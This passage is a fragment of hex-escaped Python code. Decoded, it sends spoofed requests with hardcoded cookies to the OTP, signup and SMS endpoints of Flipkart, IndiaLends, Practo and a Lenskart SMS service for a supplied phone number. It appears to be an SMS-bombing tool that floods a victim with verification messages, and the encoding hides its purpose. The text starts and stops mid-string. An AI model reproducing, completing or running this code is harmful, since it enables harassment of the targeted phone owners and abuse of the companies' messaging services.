x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x65\x72\x74\x79\x73\x76\x66\x6a\x37\x34\x73\x6a\x65\x27\x3a\x20\x63\x63\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6a\x66\x73\x64\x66\x75\x31\x34\x68\x6b\x67\x65\x72\x74\x64\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x6a\x38\x30\x67\x65\x72\x74\x64\x66\x67\x27\x3a\x20\x27\x30\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6e\x64\x69\x61\x6c\x65\x6e\x64\x73\x2e\x63\x6f\x6d\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x61\x2f\x6d\x6f\x62\x69\x6c\x65\x2d\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x5f\x76\x32\x2e\x61\x73\x68\x78\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x68\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x38\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x38\x2e\x30\x20\x46\x4b\x55\x41\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x34\x31\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x44\x65\x73\x6b\x74\x6f\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x75\x74\x66\x2d\x38\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x6c\x6f\x67\x69\x6e\x49\x64\x22\x3a\x5b\x22\x2b\x22\x2b\x63\x63\x2b\x70\x6e\x5d\x2c\x22\x73\x75\x70\x70\x6f\x72\x74\x41\x6c\x6c\x53\x74\x61\x74\x65\x73\x22\x3a\x74\x72\x75\x65\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x36\x2f\x75\x73\x65\x72\x2f\x73\x69\x67\x6e\x75\x70\x2f\x73\x74\x61\x74\x75\x73\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x37\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x54\x27\x3a\x20\x27\x42\x52\x25\x33\x41\x63\x6a\x76\x71\x7a\x68\x67\x6c\x75\x31\x6d\x7a\x74\x39\x35\x61\x79\x64\x7a\x68\x76\x77\x7a\x71\x31\x2e\x31\x35\x35\x38\x30\x33\x31\x30\x39\x32\x30\x35\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x57\x41\x42\x27\x3a\x20\x27\x62\x75\x69\x6c\x64\x2d\x34\x34\x62\x65\x39\x65\x34\x37\x34\x36\x31\x61\x37\x34\x64\x37\x33\x37\x39\x31\x34\x32\x30\x37\x62\x63\x62\x61\x66\x63\x33\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x75\x78\x5f\x75\x69\x64\x27\x3a\x20\x27\x31\x35\x35\x38\x36\x37\x39\x30\x34\x33\x38\x31\x38\x39\x32\x39\x38\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x4d\x43\x56\x53\x5f\x31\x37\x45\x42\x34\x30\x31\x30\x35\x33\x44\x41\x46\x34\x38\x34\x30\x41\x34\x39\x30\x44\x34\x43\x25\x34\x30\x41\x64\x6f\x62\x65\x4f\x72\x67\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x4d\x43\x56\x5f\x31\x37\x45\x42\x34\x30\x31\x30\x35\x33\x44\x41\x46\x34\x38\x34\x30\x41\x34\x39\x30\x44\x34\x43\x25\x34\x30\x41\x64\x6f\x62\x65\x4f\x72\x67\x27\x3a\x20\x27\x2d\x32\x32\x37\x31\x39\x36\x32\x35\x31\x25\x37\x43\x4d\x43\x49\x44\x54\x53\x25\x37\x43\x31\x38\x30\x34\x31\x25\x37\x43\x4d\x43\x4d\x49\x44\x25\x37\x43\x36\x33\x32\x37\x33\x33\x35\x33\x30\x33\x35\x35\x30\x39\x33\x30\x34\x35\x37\x36\x39\x32\x37\x37\x31\x39\x32\x30\x33\x39\x34\x38\x39\x33\x33\x32\x34\x36\x25\x37\x43\x4d\x43\x41\x49\x44\x25\x37\x43\x4e\x4f\x4e\x45\x25\x37\x43\x4d\x43\x4f\x50\x54\x4f\x55\x54\x2d\x31\x35\x35\x38\x36\x38\x36\x32\x34\x35\x73\x25\x37\x43\x4e\x4f\x4e\x45\x25\x37\x43\x4d\x43\x41\x41\x4d\x4c\x48\x2d\x31\x35\x35\x39\x32\x38\x33\x38\x34\x35\x25\x37\x43\x31\x32\x25\x37\x43\x4d\x43\x41\x41\x4d\x42\x2d\x31\x35\x35\x39\x32\x38\x33\x38\x34\x35\x25\x37\x43\x6a\x38\x4f\x64\x76\x36\x4c\x6f\x6e\x4e\x34\x72\x33\x61\x6e\x37\x4c\x68\x44\x33\x57\x5a\x72\x55\x31\x62\x55\x70\x41\x6b\x46\x6b\x6b\x69\x59\x31\x6e\x63\x42\x52\x39\x36\x74\x32\x50\x54\x49\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x5f\x63\x63\x27\x3a\x20\x27\x74\x72\x75\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x4e\x27\x3a\x20\x27\x32\x2e\x56\x49\x38\x30\x38\x35\x41\x36\x41\x32\x33\x37\x45\x42\x34\x43\x36\x32\x38\x33\x36\x43\x38\x38\x30\x39\x46\x30\x44\x33\x31\x32\x45\x42\x2e\x53\x49\x32\x31\x41\x39\x45\x43\x34\x45\x39\x39\x42\x39\x34\x39\x42\x32\x41\x43\x45\x36\x33\x36\x31\x42\x33\x46\x30\x32\x30\x38\x43\x43\x2e\x56\x53\x31\x38\x37\x36\x34\x39\x42\x32\x42\x30\x36\x41\x34\x34\x43\x36\x39\x38\x32\x34\x30\x30\x36\x37\x31\x30\x43\x42\x36\x44\x38\x33\x2e\x31\x35\x35\x38\x36\x37\x39\x30\x37\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x70\x76\x5f\x70\x6e\x27\x3a\x20\x27\x48\x6f\x6d\x65\x50\x61\x67\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x70\x76\x5f\x70\x6e\x5f\x74\x27\x3a\x20\x27\x48\x6f\x6d\x65\x70\x61\x67\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x27\x3a\x20\x27\x64\x31\x74\x31\x37\x47\x51\x56\x71\x50\x7a\x39\x4b\x50\x7a\x6f\x62\x50\x33\x4d\x34\x47\x51\x6b\x6a\x50\x79\x33\x34\x54\x6a\x66\x4a\x78\x49\x34\x53\x62\x58\x56\x49\x76\x68\x77\x7a\x6d\x33\x6d\x45\x31\x33\x76\x66\x53\x45\x75\x6c\x6d\x66\x39\x30\x44\x2f\x37\x4c\x37\x31\x30\x71\x55\x70\x4d\x71\x38\x6d\x41\x30\x6b\x32\x62\x78\x36\x62\x32\x44\x75\x77\x49\x53\x34\x67\x3d\x3d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x5f\x73\x71\x27\x3a\x20\x27\x25\x35\x42\x25\x35\x42\x42\x25\x35\x44\x25\x35\x44\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x36\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x20\x46\x4b\x55\x41\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x34\x31\x2f\x77\x65\x62\x73\x69\x74\x65\x2f\x44\x65\x73\x6b\x74\x6f\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x6f\x67\x69\x6e\x49\x64\x27\x3a\x20\x27\x2b\x27\x2b\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x74\x61\x74\x65\x27\x3a\x20\x27\x56\x45\x52\x49\x46\x49\x45\x44\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x68\x75\x72\x6e\x45\x6d\x61\x69\x6c\x52\x65\x71\x75\x65\x73\x74\x27\x3a\x20\x27\x66\x61\x6c\x73\x65\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x35\x2f\x75\x73\x65\x72\x2f\x6f\x74\x70\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x38\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x72\x65\x66\x2d\x72\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x36\x35\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x36\x35\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x44\x4e\x54\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x75\x62\x6d\x69\x74\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x27\x3a\x20\x27\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x66\x2d\x72\x2e\x63\x6f\x6d\x2f\x63\x6c\x69\x65\x6e\x74\x73\x2f\x6c\x65\x6e\x73\x6b\x61\x72\x74\x2f\x73\x6d\x73\x41\x70\x69\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x39\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x27\x3a\x20\x27\x34\x2e\x31\x32\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x50\x49\x2d\x56\x65\x72\x73\x69\x6f\x6e\x27\x3a\x20\x27\x32\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x73\x61\x6d\x73\x75\x6e\x67\x20\x53\x4d\x2d\x47\x39\x33\x35\x30\x20\x30\x20\x34\x2e\x34\x2e\x32\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x2d\x76\x65\x72\x73\x69\x6f\x6e\x27\x3a\x20\x27\x41\x6e\x64\x72\x6f\x69\x64\x2d\x34\x2e\x31\x32\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x2d\x43\x4f\x44\x45\x27\x3a\x20\x27\x31\x35\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x2d\x6e\x61\x6d\x65\x27\x3a\x20\x27\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x39\x36\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x5f\x6e\x61\x6d\x65\x27\x3a\x20\x27\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x27\x2b\x27\x2b\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x69\x6e\x67\x65\x72\x70\x72\x69\x6e\x74\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x64\x65\x76\x69\x63\x65\x5f\x6e\x61\x6d\x65\x27\x3a\x27\x73\x61\x6d\x73\x75\x6e\x67\x2b\x53\x4d\x2d\x47\x39\x33\x35\x30\x27\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\